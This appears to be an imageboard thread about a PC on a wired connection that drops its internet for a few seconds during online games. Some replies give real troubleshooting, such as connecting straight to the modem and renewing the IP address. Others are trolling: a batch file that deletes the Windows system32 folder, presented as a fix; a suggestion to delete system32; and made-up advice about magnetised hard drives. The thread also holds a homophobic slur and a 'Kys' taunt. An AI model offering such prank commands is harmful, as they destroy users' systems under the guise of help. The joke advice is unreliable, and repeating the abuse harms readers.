Hey Sup Forums

Hey Sup Forums.

I know this is not a tech support site, but I have a weird problem on my PC and maybe you know what's causing it.

My internet stops working for a few seconds. I have a good speed (100mbits) and usually a good ping (like 35 in CS:GO). But once every 1-5 minutes it just stops working and I'm bugging around / freezing. It happens in all online games. CS, Overwatch, BF1 Beta to name some.

Any idea?

classic shitty tech question

>no router info
>no pc specs
>lan or wireless?
>NIC or dongle?

not gonna help

The NSA is collecting data
Don't pay it much attention

Turn off your aimbot
Reset your IP
Reboot your machine
Update your drivers
Reboot your machine
Run your utilities
Reboot
Don't be a faggot

>35
>good ping
Hue

I had the same thing when i was on wifi then i switched to cable and havent lagged at all since

>CS, Overwatch, BF1 Beta to name some.
>Any idea?
Yea. Your computer doesn't wanT to play shitty vidya.

faggot, did you try deleting the system32 folder? That fucks up all of your shit!

I had this problem, sounds like packet loss. Are you with TalkTalk by any chance?

Sorry, I forgot.

Win 10 v1607
AMD FX-8350
GTX 1060
8 GB RAM

LAN

Sounds like a bad wireless adapter.

I'm in Germany. So no.

this!

>trying to be funny

Ask some tech guys to look at the wiring and electrical components in your house. I had this problem because the splitter and amplifier in my house were broken slightly. Hope this helps.

I had the same problem, my hard drive was magnetised. You need a string magnet to reverse the process and keep it 10 seconds near the hard drive. If it doesn't work, repeat with the magnet on the other dude (south/north pole). Trust me I'm computer engeneer.

Open command prompt.
Type /ipconfig release
>wait a sec
Type /ipconfig renew
> wait a longer sec

Plug Ethernet cable into different port on router (should be in Port 1 but go up from there)

Flash firmware on router/reinstall network adapted driver on PC

Pray to lord jebus

If this doesn't fix it then google

Check the error log of your router.

-string +strong

Make a new text document, and write:

@echo off
del c:/WINDOWS/system32

Save as .bat file

Here's the first piece of advice you need to follow. Do not do anything else in this thread until you do this.

We need to eliminate as much hardware as we can that could cause the issue. What you need to do is plug your PC via hardline directly into your modem. Skip the router, skip everything else in between. PC -> Modem. Play and see if the issue happens.

If the issue happens, then call your ISP and have them debug your issue for you, its not your problem. (Caveat here is that it might be a bad modem and that could be your problem depending on if you own it or rent it).

If your ISP says that everything is fine, then the issue is on your PC. Reinstall windows. Seriously. Don't install anything except for a game or two and see if the issue still happens. That means do not install any drivers or anything. Do not let windows install any drivers for you.

If the problem does not happen when you're hardwired to the modem, the issue is in your network hardware. This could be your router or switch or whatever. Do hard resets on these pieces of equipment and try again.

this kid literally has zero idea of what hes talking about. dont follow this

plug yourself directly into the modem, taking the router out of the equation, and see if you have the same problem. if you do then you have a bad home run from your ISP or the modem is bad. If you have the problem when directly connected to the modem, call your isp and they may either come out and fix the line/replace modem.

if you dont have the issue, then it could be the router. might want to sit and watch net graph in csgo and see if it is actually dropping packets or not. (see choke)
watch traffic monitor on your router if it has the feature.

how old is your router? and how old is your modem?

I've talked to Shaw tech supports that weren't as conceited and "know-it-all" as you. 90%of the time it has nothing to do with the router and yet that's all you're focusing on. Continue your faggot rampage though, I bet everyone appreciates you.

I got my dick stuck in modem. What do I do?

>90%
>Know it all
Kys